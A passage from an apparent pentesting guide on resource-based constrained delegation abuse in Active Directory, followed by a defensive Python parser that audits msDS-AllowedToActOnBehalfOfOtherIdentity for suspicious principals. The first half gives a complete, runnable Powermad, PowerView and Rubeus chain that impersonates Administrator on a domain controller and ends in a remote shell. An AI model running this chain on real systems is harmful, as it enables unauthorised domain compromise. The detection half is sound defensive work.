If we hold GenericAll over a directory object, we can create or modify that object freely (reset a user's password, change attributes of a computer account, and so on). The chain below uses GenericAll over a computer object to write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. to set up resource-based constrained delegation to that computer.
# Import Powermad and use it to create a new MACHINE ACCOUNT
Import-Module .\Powermad.ps1
# Or dot-source it
. .\Powermad.ps1
# Create the new machine account (its sAMAccountName will be lanz$)
New-MachineAccount -MachineAccount lanz -Password $(ConvertTo-SecureString 'buenosdias' -AsPlainText -Force) -Verbose
# Import PowerView and get the SID of the newly created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid
# Then, using that SID, build an ACE for the new machine account as a raw security descriptor (SDDL: owner BA, one allow ACE granting CCDCLCSWRPWPDTLOCRSDRCWDWO to the machine SID):
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Next, set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the computer account we are taking over, again using PowerView
# Our target could be, for example: dc.target.com
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
# After that, get the RC4 (NT) hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'buenosdias'
# Or with Python 3 (NT hash = MD4 over the UTF-16LE password; on OpenSSL 3 builds
# hashlib only exposes md4 when the legacy provider is loaded)
import hashlib
print(hashlib.new('md4', 'buenosdias'.encode('utf-16le')).hexdigest())
# For this example we impersonate the Domain Administrator against the cifs service of the target computer using Rubeus.
# The /user value is the machine account's sAMAccountName (trailing $), and the /msdsspn host must be the computer whose attribute was modified above.
Rubeus.exe s4u /user:lanz$ /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/dc.example.com /domain:example.com /ptt
Take the base64-encoded ticket that Rubeus prints, copy it to your machine, base64-decode it, and use ticketConverter.py to produce a .ccache file. Then export it in the environment variable KRB5CCNAME=ticket.ccache and use wmiexec, psexec, smbexec, etc. to authenticate as the impersonated user and get a shell.
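From the defender's side, the artifact this whole chain leaves behind is a populated msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target computer: a self-relative security descriptor whose DACL names the principals allowed to act on behalf of other identities. The following Python is an added example (not code from the original page, Powermad, PowerView or Rubeus) that parses that binary descriptor per MS-DTYP and lists the allowed SIDs with their rights, flagging domain-created principals (RID >= 1000), which is exactly what a freshly added machine account looks like. It assumes the raw attribute bytes have already been read from LDAP; the sample descriptor and the computer SID in it are constructed inline and mirror what the page's SDDL string `O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>)` produces.

```python
import struct

# Access-mask bits and their SDDL tokens, in the order used by the SDDL string
# on this page (CCDCLCSWRPWPDTLOCRSDRCWDWO == 0xF01FF).
SDDL_RIGHTS = [
    (0x00001, "CC"), (0x00002, "DC"), (0x00004, "LC"), (0x00008, "SW"),
    (0x00010, "RP"), (0x00020, "WP"), (0x00040, "DT"), (0x00080, "LO"),
    (0x00100, "CR"), (0x10000, "SD"), (0x20000, "RC"), (0x40000, "WD"),
    (0x80000, "WO"),
]
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_SELF_RELATIVE, SE_DACL_PRESENT = 0x8000, 0x0004


def parse_sid(buf, off):
    """Parse a binary SID (MS-DTYP 2.4.2.2) at buf[off:]; return (sid, next_off)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return sid, off + 8 + 4 * count


def allowed_to_act(sd):
    """Return [(sid, mask)] for each ACCESS_ALLOWED ACE in the DACL of a
    self-relative security descriptor, i.e. the principals permitted to act on
    behalf of other identities toward this computer. No DACL -> []."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, out = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", sd, pos + 4)
            sid, _ = parse_sid(sd, pos + 8)
            out.append((sid, mask))
        pos += ace_size  # deny ACEs, object ACEs etc. are skipped by their declared size
    return out


def mask_to_sddl(mask):
    """Render an access mask with the SDDL right tokens used on this page."""
    return "".join(tok for bit, tok in SDDL_RIGHTS if mask & bit)


def audit(sd):
    """Review lines for every allowed principal; RID >= 1000 means a
    domain-created account (user, group or machine), not a builtin."""
    lines = []
    for sid, mask in allowed_to_act(sd):
        rid = int(sid.rsplit("-", 1)[1])
        flag = "REVIEW: domain-created principal" if rid >= 1000 else "well-known/builtin"
        lines.append("%s rights=%s (%s)" % (sid, mask_to_sddl(mask), flag))
    return lines


# --- constructed sample input (not real directory data) ----------------------
def encode_sid(sid):
    parts = sid.split("-")
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_sample_sd(allowed_sid, mask=0xF01FF):
    """Build the self-relative SD that the page's SDDL O:BAD:(A;;...;;;<sid>) yields."""
    owner = encode_sid("S-1-5-32-544")                              # O:BA = BUILTIN\Administrators
    ace_sid = encode_sid(allowed_sid)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(ace_sid), mask) + ace_sid
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace   # ACL_REVISION=2, one ACE
    hdr = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                      20, 0, 0, 20 + len(owner))                   # owner at 20, DACL after it
    return hdr + owner + acl


def build_empty_sd():
    """Owner only, no DACL: what a cleared attribute looks like."""
    owner = encode_sid("S-1-5-32-544")
    return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE, 20, 0, 0, 0) + owner


if __name__ == "__main__":
    sample = build_sample_sd("S-1-5-21-1111-2222-3333-1105")  # constructed computer SID
    for line in audit(sample):
        print(line)
```

Run it against the bytes of msDS-AllowedToActOnBehalfOfOtherIdentity pulled from each computer object (the attribute should be empty on almost every machine in a domain); any entry flagged as a domain-created principal deserves a look at who created that account and when, and clearing the attribute removes the delegation path. The parser walks ACEs by their declared size, so descriptors containing deny or object-specific ACEs are handled without misreading the following entries.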